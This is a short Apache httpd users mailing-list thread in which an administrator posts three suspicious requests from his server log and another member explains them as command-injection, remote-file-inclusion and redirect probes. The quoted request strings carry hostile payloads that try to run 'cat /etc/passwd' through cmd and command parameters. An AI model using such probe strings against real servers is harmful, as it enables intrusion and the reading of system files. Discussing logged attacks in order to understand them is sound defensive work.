On 2/12/2014 08:04, rahul bhola wrote:
in first and last casehe was checking if it is possible to pass shell
commands throught command or cmd parameter.not sure on second one but it
looks like he was testing for unsanitized url redirection vul.
On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <[email protected]
<mailto:[email protected]>> wrote:
I found the following in my log this morning. Does anybody know
what it really means? Thanks.
A total of 3 possible successful probes were detected (the
following URLs
contain strings that match one or more of a listing of strings that
indicate a possible exploit):
/user.php?caselist[bad_file.__txt][path]=http://www.google.__com/humans.txt?&command=cat%__20/etc/passwd
<http://www.google.com/humans.txt?&command=cat%20/etc/passwd> HTTP
Response 302
/sid=__XXXXXXXXXXXXXXXXXXXXXXXXXXXX&__shopid=http://www.google.com/__humans.txt
<http://www.google.com/humans.txt>? HTTP Response 302
/gepi/gestion/savebackup.php?__filename=http://www.google.__com/humans.txt?&cmd=cat/etc/__passwd
<http://www.google.com/humans.txt?&cmd=cat/etc/passwd> HTTP Response 302
--
Knute Johnson
------------------------------__------------------------------__---------
To unsubscribe, e-mail: users-unsubscribe@httpd.__apache.org
<mailto:[email protected]>
For additional commands, e-mail: [email protected]
<mailto:[email protected]>
--
Rahul Bhola
B.E.
computers
Core Member
Department of backstage
Bits Pilani KK Birla Goa Campus
So you think he was trying to get the content of my passwd file? So
what would that get him?
Is it possible to do this myself to see what he could have gotten?
Thanks,
--
Knute Johnson
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
